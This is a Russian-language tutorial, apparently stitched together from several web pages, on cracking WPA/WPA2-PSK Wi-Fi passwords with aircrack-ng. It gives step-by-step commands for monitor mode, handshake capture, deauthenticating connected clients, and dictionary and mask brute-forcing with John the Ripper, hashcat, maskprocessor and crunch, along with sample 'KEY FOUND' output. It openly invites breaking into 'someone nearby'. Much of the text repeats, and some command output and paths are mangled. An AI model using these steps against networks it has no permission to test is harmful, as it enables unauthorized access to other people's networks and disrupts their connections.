Как пользоваться программой aircrack ng


Коротко о Aircrack-NG

Если вы хотите узнать, как взломать WiFi роутер — просто прочтите эту пошаговую инструкцию по использованию aircrack-ng, выполните ряд проверенных команд и с легкостью взломайте пароль от WiFi.

С помощью этих команд вы сможете взломать WiFi роутер с WPA/WPA2-PSK (pre-shared key) шифрованием.

Основа этого способа взлома WiFi заключается в перехвате WPA/WPA2 рукопожатия во время аутентификации и взломе PSK с помощью aircrack-ng.

Как взломать WiFi — основные шаги:

  1. Установите последнюю версии aircrack-ng
  2. Переведите беспроводной сетевой интерфейс в режим мониторинга с помощью airmon-ng
  3. Запустите airodump-ng для перехвата рукопожатия на канале точки доступа с фильтрацией по BSSID
  4. [Опционально] Используйте aireplay-ng для де-аутентификации клиента
  5. Запустите aircrack-ng для взлома WPA/WPA2-PSK с помощью перехваченного рукопожатия
1. Aircrack-ng: Скачать и Установить

Только Последняя Версия: Если вы действительно хотите взломать WiFi — не стоит устанавливать устаревший aircrack-ng из репозитория ваше операционной системы. Скачайте и скомпилируйте последнюю версию самостоятельно.

Установите необходимы зависимости:

$ sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev

Скачайте и установите последнюю версию aircrack-ng (текущая версия):

wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz -O -- | tar -xz

Убедитесь что установлена именно последняя версия aircrack-ng:

aircrack-ng --help Aircrack-ng 1.2 rc4 -- (C) 2006-2015 Thomas d’Otreppe http://www.aircrack-ng.org
2. Airmon-ng: Режим Мониторинга

Теперь необходимо перевести беспроводной сетевой интерфейс в режим мониторинга.

Режим мониторинга позволяет компьютеру с беспроводным сетевым интерфейсом мониторить весь трафик в беспроводной сети.

Что особенно для нас важно, так это то, что режим мониторинга позволяет перехватывать все передающиеся пакеты без непосредственного подключения к какому-либо WiFi роутеру.

Найдите и остановите все процессы, которые могут помешать:

$ sudo airmon-ng check kill

Запустите беспроводной интерфейс в режиме мониторинга:

$ sudo airmon-ng start wlan0 Interface Chipset Driver wlan0 Intel 6235 iwlwifi – [phy0] (monitor mode enabled on mon0)

В приведенном выше примере, airmon-ng создал новый беспроводной интерфейс mon0 и переключил его в режим мониторинга.

Таким образом, mon0 — это правильное имя интерфейса, которое мы будем использовать далее в этом руководстве.

3. Airodump-ng: Перехват Рукопожатия

Теперь, когда беспроводной адаптер переведен в режим мониторинга, у нас появилась возможность видеть весь проходящий мимо нас трафик.

Это можно сделать с помощью команды airodump-ng:

$ sudo airodump-ng mon0

Все видимые точки доступа показаны в верхней части экрана, а подключенные клиенты в нижней:

CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46BSSID PWR Beacons #Data, #/sESSID 00:11:22:33:44:55 -48 212 1536 66 1 54eWPA2 CCMP PSK CrackMe 66:77:88:99:00:11 -64 134 345 34 1 54eWPA2 CCMP PSK SomeAP BSSID STATIONPWR Rate Lost Frames Probe 00:11:22:33:44:55-78 0 -- 1 0 1 66:77:88:99:00:11MM:NN:OO:PP:QQ:RR -78 2 -- 32 0 1

Для того, чтобы поймать рукопожатие, определите интересующую вас точку доступа и запустите airodump-ng на том же канале с фильтром по BSSID:

$ sudo airodump-ng -c 1 –bssid 00:11:22:33:44:55 -w WPAcrack mon0 –ignore-negative-one

ОпцияОписание
-cКанал беспроводной сети
--bssidMAC адрес точки доступа
-wПрефикс файла в который будет записано рукопожатие
mon0Сетевой интерфейс
--ignore-negative-oneУбирает сообщение ‘fixed channel : -1’

Теперь нам остается только ждать когда airodump-ng словит рукопожатие.

Если вы хотите ускорить этот процесс — перейдите к шагу #4 и попытайтесь заставить подключенного беспроводного клиента переподключиться к роутеру.

По прошествию некоторого времени вы должны увидеть сообщение WPA handshake: 00:11:22:33:44:55 в правом верхнем углу экрана.

Это сообщение означает, что airodump-ng успешно перехватил рукопожатие:

CH 1 ][ Elapsed: 45 s ][ 2014-05-29 13:15 WPA handshake: 00:11:22:33:44:55 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:11:22:33:44:55 -48 212 1536 66 1 54e WPA2 CCMP PSK CrackMe BSSID STATION PWR Rate Lost Frames Probe 00:11:22:33:44:55 AA:BB:CC:DD:EE:FF -44 0 -- 1 114 56
4. Aireplay-ng: Деаутентификации Клиента

Если вы не хотите ждать пока airodump-ng перехватит рукопожатие, вы можете сами попробовать отправить сообщение клиенту, сказав что он больше не подключен к точке доступа.

После этого есть вероятность того, что беспроводной клиент попробует переподключиться и мы сможем перехватил рукопожатие.

Отправить широковещательное deauth сообщение:

$ sudo aireplay-ng –deauth 100 -a 00:11:22:33:44:55 mon0 –ignore-negative-one

Отправить направленное deauth сообщение (атака более эффективна когда направленна на конкретного клиента):

$ sudo aireplay-ng –deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0 –ignore-negative-one

ОпцияОписание
--deauth 100Сколько deauth сообщений отправить (0 — без ограничений)
-aMAC адрес точки доступа
-cMAC адрес клиента
mon0Сетевой интерфейс
--ignore-negative-oneУбирает сообщение ‘fixed channel : -1’
5. Aircrack-ng: Взлом WiFi Пароля

К сожалению, кроме как с помощью грубой силы, не существует способа взлома WPA/WPA2-PSK шифрования.

Для взлома WiFi необходим словарь с паролями для перебора.

Главное помните, что этот способ взлома настолько хорош, насколько хорош ваш словарь с паролями.

Некоторые словари можно скачать отсюда.

Выполните следующую команду, чтобы взломать WPA/WPA2-PSK:

$ aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack.cap

ОпцияОписание
-wПуть к словарю с паролями
-bMAC адрес точки доступа
WPAcrack.capФайл, содержащий перехваченное рукопожатие
Aircrack-ng 1.2 beta3 r2393 [00:08:11] 548872 keys tested (1425.24 k/s) KEY FOUND! [ 987654321 ] Master Key : 5C 9D 3F B6 24 3B 3E 0F F7 C2 51 27 D4 D3 0E 97 CB F0 4A 28 00 93 4A 8E DD 04 77 A3 A1 7D 15 D5 Transient Key : 3A 3E 27 5E 86 C3 01 A8 91 5A 2D 7C 97 71 D2 F8 AA 03 85 99 5C BF A7 32 5B 2F CD 93 C0 5B B5 F6 DB A3 C7 43 62 F4 11 34 C6 DA BA 38 29 72 4D B9 A3 11 47 A6 8F 90 63 46 1B 03 89 72 79 99 21 B3 EAPOL HMAC : 9F B5 F4 B9 3C 8B EA DF A0 3E F4 D4 9D F5 16 62
6. Aircrack-ng: Пауза и Возобновление Перебора Паролей

Иногда нет возможности за один раз найти WPA/WPA2-PSK ключ с помощью aircrack-ng, особенно когда используется очень большой словарь для перебора.

К сожалению, в aircrack-ng нет встроенной паузы и нельзя возобновлять остановленный перебор, но это можно делать с помощью John The Ripper, который умеет сохранять и возобновлять сессии.

Установите John The Ripper

Установите John The Ripper, если вы не сделали этого ранее:

$ sudo apt-get install john

Пауза/Возобновление Aircrack-ng

При переборе WPA/WPA2-PSK ключей с помощью John The Ripper, вы можете узнать о текущем прогрессе, нажав почти на любую клавишу.

При нажатии q либо Ctrl-C, John The Ripper останавливает (ставит на паузу) перебор и сохраняет информацию о прогрессе текущей сессии в файл ~/.john/john.rec (по умолчанию).

Для возобновления сессии, запустите John с опцией --restore=[имя сессии].

Создадим с помощью John The Ripper сессию foo, через пайп перенаправим вывод в aircrack-ng и попробуем ПРИОСТАНОВИТЬ, а затем ВОЗОБНОВИТЬ перебор.

Aircrack-ng: НАЧАЛО ПЕРЕБОРА

Начнем Перебор WPA/WPA2-PSK ключей с помощью John The Ripper и aircrack-ng:

$ john –session=foo –stdout –wordlist=wordlist.dic | aircrack-ng -w – -b 00:11:22:33:44:55 WPAcrack.cap

ОпцияОписание
--sessionИмя сессии
--wordlistПуть к словарю с паролями
-bMAC адрес точки доступа
WPAcrack.capФайл содержащий перехваченное рукопожатие
Aircrack-ng: ПАУЗА

Нажмите q либо Ctrl-C, чтобы остановить перебор.

Aircrack-ng: ВОЗОБНОВЛЕНИЕ

Возобновляем перебор с момента, когда он был остановлен (продолжаем сессию foo):

$ john –restore=foo | aircrack-ng -w – -b 00:11:22:33:44:55 WPAcrack.cap

7. Подробнее о «John the Ripper» — Взломщик Паролей

«John the Ripper» — это быстрый взломщик паролей. Его основной целью является нахождение слабых UNIX паролей.

Вероятнее всего, Вам не нужно устанавливать «John the Ripper» для всей системы.

Вместо этого, после извлечения и компилирования исходного кода (см. ниже), Вы просто зайдете в директорию «run» и запустите Джона оттуда.

Собираем «John the Ripper»

Шаг 1: Скачаем последнюю версию «John the Ripper» и его подпись

wget http://www.openwall.com/john/g/john-1.7.9.tar.bz2 $ wget http://www.openwall.com/john/g/john-1.7.9.tar.bz2.sign $ wget http://www.openwall.com/signatures/openwall-signatures.asc

Шаг 2: Подтвердим подпись

Это необходимая мера безопасности, поскольку мы имеем дело с опасной вещью.

Для этого установим открытый ключ:

$ pgp -ka openwall-signatures.asc

И проверим подпись:

pgp john-1.7.9.tar.bz2.sign john-1.7.9.tar.bz2 gpg: Signature made Wed 23 Nov 2011 01:38:48 PM CAT using RSA key ID 295029F1 gpg: Good signature from “Openwall Project ” gpg: WARNING: This key is not certified with a trusted signature! gpg: There is no indication that the signature belongs to the owner. Primary key fingerprint: 0C 29 43 AE 1E CD 24 EA 6E 0C B6 EE F5 84 25 69

Мы должны увидеть, аналогичное вышеуказанному, сообщение. Обращаем внимание на строку Good signature from «Openwall Project … «, которая означает успешную проверку подписи.

Предупреждение при проверке подписи, это нормально. Более подробную информацию, Вы можете найти по ссылке: http://www.kernel.org/signature.html.

Шаг 3: Извлекаем и компилируем исходники

tar xvfj john-1.7.9.tar.bz2 $ cd john-1.7.9/src/ $ make To build John the Ripper, type: make clean  where SYSTEM can be one of the following: linux-x86-64-avx Linux, x86-64 with AVX (2011+ Intel CPUs) linux-x86-64-xop Linux, x86-64 with AVX and XOP (2011+ AMD CPUs) linux-x86-64 Linux, x86-64 with SSE2 (most common) ***

Находим в списке нашу систему и набираем:

$ make clean

Где — установленная у нас операционная система. В случае если Вы не нашли свою систему в списке, используйте:

$ make clean generic

Если все прошло успешно, вышеперечисленные действия приводят к созданию исполняемых файлов для Джона и связанных с ним утилит, в директории «../run/».

Также, Вы можете скопировать всю папку «run» куда угодно и запускать Джона оттуда.

Теперь мы можем перейти в директорию «../run/» и протестировать работу Джона:

v $ cd ../run/ $ ./john –test Many salts: 400332 c/s real, 400332 c/s virtual Only one salt: 383795 c/s real, 391627 c/s virtual — Benchmarking: BSDI DES (x725) [32/32 BS]… DONE Many salts: 13362 c/s real, 13388 c/s virtual Only one salt: 13299 c/s real, 13299 c/s virtual — Benchmarking: FreeBSD MD5 [32/32 X2]… DONE Raw: 9225 c/s real, 9225 c/s virtual *** [/simterm]

Установка «John the Ripper» в Ubuntu

Выполните следующую команду для установки «John the Ripper» в Ubuntu:

$ sudo apt-get install john

Установка «John the Ripper» в CentOS/RHEL

Выполните следующую команду для установки «John the Ripper» в CentOS/RHEL:

$ yum install john

Информация предоставленная в данной статье носит исключительно ознакомительный характер, автор статьи не несет ответственности за возможное причинение вреда

Как пользоваться программой aircrack ng

Успешно захваченное рукопожатие можно взламывать различными программами. Если вам удалось настроить проприетарные драйверы видеокарты, то, конечно, рекомендуется делать взлом программой Hashcat. Скорость перебора кандидатов в пароли будет на порядок выше.

Если вы хотите делать перебор WPA PSK паролей только силой процессора, то одной из подходящего для этого программ является Aircrack-ng. Из минусов этой программы можно отметить то, что она не использует видеокарту.

Ещё большим минусом является отсутствие поддержки масок, правил и других вариантов перебора.

Хотя последний недостаток нивелируется тем, что Aircrack-ng может работать в паре с другими программами, которые поддерживают эти самые маски, правила, генерацию паролей на лету.

Ещё одним плюсом программы является то, что она прекрасно работает под Windows.

Простейший вариант использования Aircrack-ng:

aircrack-ng -w путь_до_словаря -e ТД рукопожатие.cap

Хотя команда простая, поясним, что:

  • -w путь_до_словаря — в словаре один кандидат в пароли должен быть расположен на отдельной строке, т. е. один пароль на одну строку.
  • -e ТД. После этой опции нужно указать имя точки доступа. Если в файле захвата информация о нескольких точка доступа (а обычно так и бывает, если вы предварительно не сделали очистку этого файла), то Aircrack-ng спросит, для какой ТД нужно взламывать пароль. Т.е. эта опция является необязательной — выбор можно сделать после запуска программы. В качестве альтернативы можно использовать опцию -b, после которой нужно указать MAC адрес ТД.
  • рукопожатие.cap — файл с захваченным рукопожатием

Итак, у меня словарь размещён в файле /home/mial/2ndHDD/newrockyou.txt, точка доступа носит имя dlink, а файл рукопожатия называется dlink-02.cap и размещён в текущей рабочей директории, тогда у меня получается команда:

aircrack-ng -w /home/mial/2ndHDD/newrockyou.txt -e dlink dlink-02.cap

Перебор запущен:

Как видим, все восемь ядер процесса загружены полностью:

Ключ найден!

Об этом нам говорит надпись KEY FOUND!

Aircrack-ng 1.2 rc4 [00:37:08] 7431796/9894689 keys tested (3186.12 k/s) Time left: 12 minutes, 53 seconds 75.11% KEY FOUND! [ pattayateam ] Master Key : D3 AD 16 B8 E1 F9 39 37 99 FE 25 FE EB AA 61 74 9C 81 E1 18 39 82 E9 D3 9F 3B 28 5C 4B FE 67 77 Transient Key : 8C 88 24 58 C7 E3 B2 DC 2C 9C 33 4A 9D 52 70 BA F1 56 9C 1B 14 46 C5 49 64 AC 1B 6B 6A 81 E4 88 7D D9 F8 25 70 C7 6C 3A 95 04 09 41 33 36 E2 AB 2E D5 90 A4 5F 90 41 ED 3A 54 2F 72 5B 8E BF 89 EAPOL HMAC : AF AD DC CE 9A 1F DF F4 8A 74 28 CC C5 CF 8C 87

Использование в Aircrack-ng паролей, созданных в других программах

Aircrack-ng может работать с любыми программами, выводящими пароли в стандартный вывод. Для этого с опцией -w вместо указания пути до словаря нужно поставить чёрточку (—). А сами пароли передать по трубе (|) из программы-генератора в Aircrack-ng. В общем виде команда выглядит так:

генератор_паролей | aircrack-ng -w — -e ТД рукопожатие.cap

Использование сгенерированных в Hashcat паролей в Aircrack-ng

Для того, чтобы не взламывать пароли, а только показать кандидаты, в Hashcat есть опция —stdout

Также нам нужно указать режим взлома (опция -a) и саму маску. 

# | Режим ===+====== 0 | Прямой 1 | Комбинированный 3 | Брут-форс 6 | Гибридный словарь + маска 7 | Гибридный маска + словарь — [ Встроенные наборы символов ] — ? | Набор символов ===+========= l | abcdefghijklmnopqrstuvwxyz u | ABCDEFGHIJKLMNOPQRSTUVWXYZ d | 0123456789 h | 0123456789abcdef H | 0123456789ABCDEF s | !»#$%&'()*+,-./:;[email protected][\]_`{|}~ a | ?l?u?d?s b | 0x00 — 0xff

В итоге команда для показа паролей выглядит так:

hashcat —stdout -a 3 pattaya?l?l?l?l

Здесь:

  • —stdout означает только показывать кандидаты в пароли
  • -a 3 выбран режим брутфорса/атаки по маске
  • pattaya?l?l?l?l — сама маска. Все создаваемые пароли в начале слова будут иметь pattaya, а далее будут идти четыре маленькие буквы. Рекомендуется ознакомиться с правилами составления масок для Hashcat: https://kali.tools/?p=578

Команда передачи сгенерированных паролей из hashcat в aircrack-ng для моих данных выглядит так:

hashcat —stdout -a 3 pattaya?l?l?l?l | aircrack-ng -w — -e dlink dlink-02.cap

Совместная работа Aircrack-ng и maskprocessor

Программа maskprocessor является частью пакета hashcat. Её предназначение — генерировать кандидаты в пароли по маске. Использовать  maskprocessor даже проще, чем саму hashcat, которая без необходимых зависимостей даже не запустится на некоторых системах.

Синтаксис команды очень прост:

maskprocessor маска

Например, для моего подобранного пароля маска могла бы быть pattaya?l?l?l?l Проверим:

maskprocessor pattaya?l?l?l?l | aircrack-ng -w — -e dlink dlink-02.cap

Начался перебор:

Готово:

Совместная работа Aircrack-ng и statsprocessor

Statsprocessor — это ещё одна программа, которая поставляется с  Hashcat. Statsprocessor — это высокопроизводительный генератор слов (словарей), основан на по позиционной атаке Маркова, упакован в отдельный исполняемый файл.

Взлом Wi-Fi в Aircrack-ng с генерируемыми на лету паролями в Crunch

Crunch — генератор словарей с паролями, в которых можно определить стандартную или заданную кодировку. Crunch может создать список слов со всевозможными комбинациями и перестановками в соответствии с заданными критериями. Данные, которые выводит crunch, могут быть отображены на экране, сохранены в файл или переданы в другую программу.

 Простой пример использования:

crunch [набор символов]

Вообще, Crunch очень гибкая программа, и чтобы использовать её на 100% нужно изучить её опции и ознакомиться с примерами. Разнообразные примеры использования crunch вы найдёте на странице: https://kali.tools/?p=720

Для моего случая можно было бы сделать так:

crunch 11 11 -t [email protected]@@@ | aircrack-ng -w — -e dlink dlink-02.cap

Или так:

crunch 11 11 -t @@@@@@@@@@@ | aircrack-ng -w — -e dlink dlink-02.cap

Взлом Wi-Fi паролей в Aircrack-ng с John the Ripper

John the Ripper поддерживает вывод кандидатов (опция —stdout), а также различные правила генерации паролей. У John the Ripper свой собственный синтаксис, но в целом можно достичь такого же результата, как и с уже рассмотренными программами. Поэтому если вы больше знакомы с John the Ripper, то можете использовать его в командах вида:

./john —wordlist= —rules —stdout | aircrack-ng -e -w —

Взлом WPA паролей с Aircrack-ng в Windows

Поскольку пакет Aircrack-ng является кроссплатформенным, то можно делать взлом WPA хендшейка и в Windows. Зайдите на официальный сайт, скачайте версию для Windows, распакуйте скаченный архив.

Перейдите в каталог, где размещён исполнимый файл aircrack-ng-avx.exe (у вас путь будет другим):

cd C:\Users\Alex\Downloads\aircrack-ng-1.2-rc4-win\bin\64bit\

Пример запуска взлома:

aircrack-ng-avx.exe -w D:ewrockyou.txt -e dlink dlink-02.cap

Где:

  • -w D:ewrockyou.txt – это путь до словаря;
  • -e dlink – выбранная для взлома точка доступа
  • dlink-02.cap – файл с захваченным рукопожатием, размещён в той же папке, что и исполнимый файл.

Кстати, вы найдёте три схожих файла:

  • aircrack-ng-avx.exe
  • aircrack-ng-avx2.exe
  • aircrack-ng-sse2.exe

Попробуйте их все – у них будет разная производительность, а некоторые могут не запуститься.

Заключение

Aircrack-ng хорошо комбинируется с генераторами паролей и способна работать под Windows. Тем не менее, намного больших результатов можно получить взламывая пароль используя графическую карту.

Коротко о Aircrack-NG

Если вы хотите узнать, как взломать WiFi роутер — просто прочтите эту пошаговую инструкцию по использованию aircrack-ng, выполните ряд проверенных команд и с легкостью взломайте пароль от WiFi.

С помощью этих команд вы сможете взломать WiFi роутер с WPA/WPA2-PSK (pre-shared key) шифрованием.

Основа этого способа взлома WiFi заключается в перехвате WPA/WPA2 рукопожатия во время аутентификации и взломе PSK с помощью aircrack-ng.

Как взломать WiFi — основные шаги:

  1. Установите последнюю версии aircrack-ng
  2. Переведите беспроводной сетевой интерфейс в режим мониторинга с помощью airmon-ng
  3. Запустите airodump-ng для перехвата рукопожатия на канале точки доступа с фильтрацией по BSSID
  4. [Опционально] Используйте aireplay-ng для де-аутентификации клиента
  5. Запустите aircrack-ng для взлома WPA/WPA2-PSK с помощью перехваченного рукопожатия

1. Aircrack-ng: Скачать и Установить

Только Последняя Версия: Если вы действительно хотите взломать WiFi — не стоит устанавливать устаревший aircrack-ng из репозитория ваше операционной системы. Скачайте и скомпилируйте последнюю версию самостоятельно.

Установите необходимы зависимости:

$ sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev

Скачайте и установите последнюю версию aircrack-ng (текущая версия):

$ wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz -O — | tar -xz$ cd aircrack-ng-1.2-rc4$ sudo make$ sudo make install

Убедитесь что установлена именно последняя версия aircrack-ng:

$ aircrack-ng —help Aircrack-ng 1.2 rc4 — (C) 2006-2015 Thomas d'Otreppe http://www.aircrack-ng.org

2. Airmon-ng: Режим Мониторинга

Теперь необходимо перевести беспроводной сетевой интерфейс в режим мониторинга.

Режим мониторинга позволяет компьютеру с беспроводным сетевым интерфейсом мониторить весь трафик в беспроводной сети.

Что особенно для нас важно, так это то, что режим мониторинга позволяет перехватывать все передающиеся пакеты без непосредственного подключения к какому-либо WiFi роутеру.

Найдите и остановите все процессы, которые могут помешать:

$ sudo airmon-ng check kill

Запустите беспроводной интерфейс в режиме мониторинга:

$ sudo airmon-ng start wlan0Interface Chipset Driver wlan0 Intel 6235 iwlwifi — [phy0] (monitor mode enabled on mon0)

В приведенном выше примере, airmon-ng создал новый беспроводной интерфейс mon0 и переключил его в режим мониторинга.

Таким образом, mon0 — это правильное имя интерфейса, которое мы будем использовать далее в этом руководстве.

Читайте также  Как удалить программу аваст с компьютера полностью

3. Airodump-ng: Перехват Рукопожатия

Теперь, когда беспроводной адаптер переведен в режим мониторинга, у нас появилась возможность видеть весь проходящий мимо нас трафик.

Это можно сделать с помощью команды airodump-ng:

$ sudo airodump-ng mon0

Все видимые точки доступа показаны в верхней части экрана, а подключенные клиенты в нижней:

CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:11:22:33:44:55 -48 212 1536 66 1 54e WPA2 CCMP PSK CrackMe66:77:88:99:00:11 -64 134 345 34 1 54e WPA2 CCMP PSK SomeAP BSSID STATION PWR Rate Lost Frames Probe 00:11:22:33:44:55 AA:BB:CC:DD:EE:FF -44 0 — 1 114 5600:11:22:33:44:55 GG:HH:II:JJ:KK:LL -78 0 — 1 0 166:77:88:99:00:11 MM:NN:OO:PP:QQ:RR -78 2 — 32 0 1

Для того, чтобы поймать рукопожатие, определите интересующую вас точку доступа и запустите airodump-ng на том же канале с фильтром по BSSID:

$ sudo airodump-ng -c 1 —bssid 00:11:22:33:44:55 -w WPAcrack mon0 —ignore-negative-one

ОпцияОписание
-c Канал беспроводной сети
—bssid MAC адрес точки доступа
-w Префикс файла в который будет записано рукопожатие
mon0 Сетевой интерфейс
—ignore-negative-one Убирает сообщение ‘fixed channel : -1’

Теперь нам остается только ждать когда airodump-ng словит рукопожатие.

Если вы хотите ускорить этот процесс — перейдите к шагу #4 и попытайтесь заставить подключенного беспроводного клиента переподключиться к роутеру.

По прошествию некоторого времени вы должны увидеть сообщение WPA handshake: 00:11:22:33:44:55 в правом верхнем углу экрана.

Это сообщение означает, что airodump-ng успешно перехватил рукопожатие:

CH 1 ][ Elapsed: 45 s ][ 2014-05-29 13:15 WPA handshake: 00:11:22:33:44:55 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:11:22:33:44:55 -48 212 1536 66 1 54e WPA2 CCMP PSK CrackMe BSSID STATION PWR Rate Lost Frames Probe 00:11:22:33:44:55 AA:BB:CC:DD:EE:FF -44 0 — 1 114 56

4. Aireplay-ng: Деаутентификации Клиента

Если вы не хотите ждать пока airodump-ng перехватит рукопожатие, вы можете сами попробовать отправить сообщение клиенту, сказав что он больше не подключен к точке доступа.

После этого есть вероятность того, что беспроводной клиент попробует переподключиться и мы сможем перехватил рукопожатие.

Отправить широковещательное deauth сообщение:

$ sudo aireplay-ng —deauth 100 -a 00:11:22:33:44:55 mon0 —ignore-negative-one

Отправить направленное deauth сообщение (атака более эффективна когда направленна на конкретного клиента):

$ sudo aireplay-ng —deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0 —ignore-negative-one

ОпцияОписание
—deauth 100 Сколько deauth сообщений отправить (0 — без ограничений)
-a MAC адрес точки доступа
-c MAC адрес клиента
mon0 Сетевой интерфейс
—ignore-negative-one Убирает сообщение ‘fixed channel : -1’

5. Aircrack-ng: Взлом WiFi Пароля

К сожалению, кроме как с помощью грубой силы, не существует способа взлома WPA/WPA2-PSK шифрования.

Для взлома WiFi необходим словарь с паролями для перебора.

Главное помните, что этот способ взлома настолько хорош, насколько хорош ваш словарь с паролями.

Некоторые словари можно скачать отсюда.

Выполните следующую команду, чтобы взломать WPA/WPA2-PSK:

$ aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack.cap

ОпцияОписание
-w Путь к словарю с паролями
-b MAC адрес точки доступа
WPAcrack.cap Файл, содержащий перехваченное рукопожатие

Aircrack-ng 1.2 beta3 r2393 [00:08:11] 548872 keys tested (1425.24 k/s) KEY FOUND! [ 987654321 ] Master Key : 5C 9D 3F B6 24 3B 3E 0F F7 C2 51 27 D4 D3 0E 97 CB F0 4A 28 00 93 4A 8E DD 04 77 A3 A1 7D 15 D5 Transient Key : 3A 3E 27 5E 86 C3 01 A8 91 5A 2D 7C 97 71 D2 F8 AA 03 85 99 5C BF A7 32 5B 2F CD 93 C0 5B B5 F6 DB A3 C7 43 62 F4 11 34 C6 DA BA 38 29 72 4D B9 A3 11 47 A6 8F 90 63 46 1B 03 89 72 79 99 21 B3 EAPOL HMAC : 9F B5 F4 B9 3C 8B EA DF A0 3E F4 D4 9D F5 16 62

6. Aircrack-ng: Пауза и Возобновление Перебора Паролей

Иногда нет возможности за один раз найти WPA/WPA2-PSK ключ с помощью aircrack-ng, особенно когда используется очень большой словарь для перебора.

К сожалению, в aircrack-ng нет встроенной паузы и нельзя возобновлять остановленный перебор, но это можно делать с помощью John The Ripper, который умеет сохранять и возобновлять сессии.

Установите John The Ripper

Установите John The Ripper, если вы не сделали этого ранее:

$ sudo apt-get install john

Пауза/Возобновление Aircrack-ng

При переборе WPA/WPA2-PSK ключей с помощью John The Ripper, вы можете узнать о текущем прогрессе, нажав почти на любую клавишу.

При нажатии q либо Ctrl-C, John The Ripper останавливает (ставит на паузу) перебор и сохраняет информацию о прогрессе текущей сессии в файл ~/.john/john.rec (по умолчанию).

Для возобновления сессии, запустите John с опцией —restore=[имя сессии].

Создадим с помощью John The Ripper сессию foo, через пайп перенаправим вывод в aircrack-ng и попробуем ПРИОСТАНОВИТЬ, а затем ВОЗОБНОВИТЬ перебор.

Aircrack-ng: НАЧАЛО ПЕРЕБОРА

Начнем Перебор WPA/WPA2-PSK ключей с помощью John The Ripper и aircrack-ng:

$ john —session=foo —stdout —wordlist=wordlist.dic | aircrack-ng -w — -b 00:11:22:33:44:55 WPAcrack.cap

ОпцияОписание
—session Имя сессии
—wordlist Путь к словарю с паролями
-b MAC адрес точки доступа
WPAcrack.cap Файл содержащий перехваченное рукопожатие

Aircrack-ng: ПАУЗА

Нажмите q либо Ctrl-C, чтобы остановить перебор.

Aircrack-ng: ВОЗОБНОВЛЕНИЕ

Возобновляем перебор с момента, когда он был остановлен (продолжаем сессию foo):

$ john —restore=foo | aircrack-ng -w — -b 00:11:22:33:44:55 WPAcrack.cap

7. Подробнее о «John the Ripper» — Взломщик Паролей

«John the Ripper» — это быстрый взломщик паролей. Его основной целью является нахождение слабых UNIX паролей.

Вероятнее всего, Вам не нужно устанавливать «John the Ripper» для всей системы.

Вместо этого, после извлечения и компилирования исходного кода (см. ниже), Вы просто зайдете в директорию «run» и запустите Джона оттуда.

Собираем «John the Ripper»

Шаг 1: Скачаем последнюю версию «John the Ripper» и его подпись

$ wget http://www.openwall.com/john/g/john-1.7.9.tar.bz2$ wget http://www.openwall.com/john/g/john-1.7.9.tar.bz2.sign$ wget http://www.openwall.com/signatures/openwall-signatures.asc

Шаг 2: Подтвердим подпись

Это необходимая мера безопасности, поскольку мы имеем дело с опасной вещью.

Для этого установим открытый ключ:

$ pgp -ka openwall-signatures.asc

И проверим подпись:

$ pgp john-1.7.9.tar.bz2.sign john-1.7.9.tar.bz2gpg: Signature made Wed 23 Nov 2011 01:38:48 PM CAT using RSA key ID 295029F1gpg: Good signature from «Openwall Project «gpg: WARNING: This key is not certified with a trusted signature!gpg: There is no indication that the signature belongs to the owner.Primary key fingerprint: 0C 29 43 AE 1E CD 24 EA 6E 0C B6 EE F5 84 25 69

Мы должны увидеть, аналогичное вышеуказанному, сообщение. Обращаем внимание на строку Good signature from «Openwall Project … «, которая означает успешную проверку подписи.

Предупреждение при проверке подписи, это нормально. Более подробную информацию, Вы можете найти по ссылке: http://www.kernel.org/signature.html.

Шаг 3: Извлекаем и компилируем исходники

$ tar xvfj john-1.7.9.tar.bz2$ cd john-1.7.9/src/$ makeTo build John the Ripper, type:make clean where SYSTEM can be one of the following:linux-x86-64-avx Linux, x86-64 with AVX (2011+ Intel CPUs)linux-x86-64-xop Linux, x86-64 with AVX and XOP (2011+ AMD CPUs)linux-x86-64 Linux, x86-64 with SSE2 (most common)***

Находим в списке нашу систему и набираем:

$ make clean

Где — установленная у нас операционная система. В случае если Вы не нашли свою систему в списке, используйте:

$ make clean generic

Если все прошло успешно, вышеперечисленные действия приводят к созданию исполняемых файлов для Джона и связанных с ним утилит, в директории «../run/».

Также, Вы можете скопировать всю папку «run» куда угодно и запускать Джона оттуда.

Теперь мы можем перейти в директорию «../run/» и протестировать работу Джона:

$ cd ../run/$ ./john —testMany salts: 400332 c/s real, 400332 c/s virtualOnly one salt: 383795 c/s real, 391627 c/s virtual—Benchmarking: BSDI DES (x725) [32/32 BS]… DONEMany salts: 13362 c/s real, 13388 c/s virtualOnly one salt: 13299 c/s real, 13299 c/s virtual—Benchmarking: FreeBSD MD5 [32/32 X2]… DONERaw: 9225 c/s real, 9225 c/s virtual***

Установка «John the Ripper» в Ubuntu

Выполните следующую команду для установки «John the Ripper» в Ubuntu:

$ sudo apt-get install john

Установка «John the Ripper» в CentOS/RHEL

Выполните следующую команду для установки «John the Ripper» в CentOS/RHEL:

$ yum install john

Информация предоставленная в данной статье носит исключительно ознакомительный характер, автор статьи не несет ответственности за возможное причинение вреда

Источник: https://xakinfo.ru/2018/12/aircrack-ng/

Взлом Wi-Fi

Это краткое пошаговое руководство, которое демонстрирует способ взлома сетей Wi-Fi, защищённых слабыми паролями. Оно не исчерпывающее, но этой информации должно хватить, чтобы вы протестировали свою собственную сетевую безопасность или взломали кого-нибудь поблизости.

Изложенная ниже атака полностью пассивна (только прослушивание, ничего не транслируется с вашего компьютера) и о ней невозможно узнать, если вы только реально не воспользуетесь паролем, который взломали. Необязательную активную атаку с деаутентификацией можно применить для ускорения разведывательного процесса. Она описана в конце статьи.

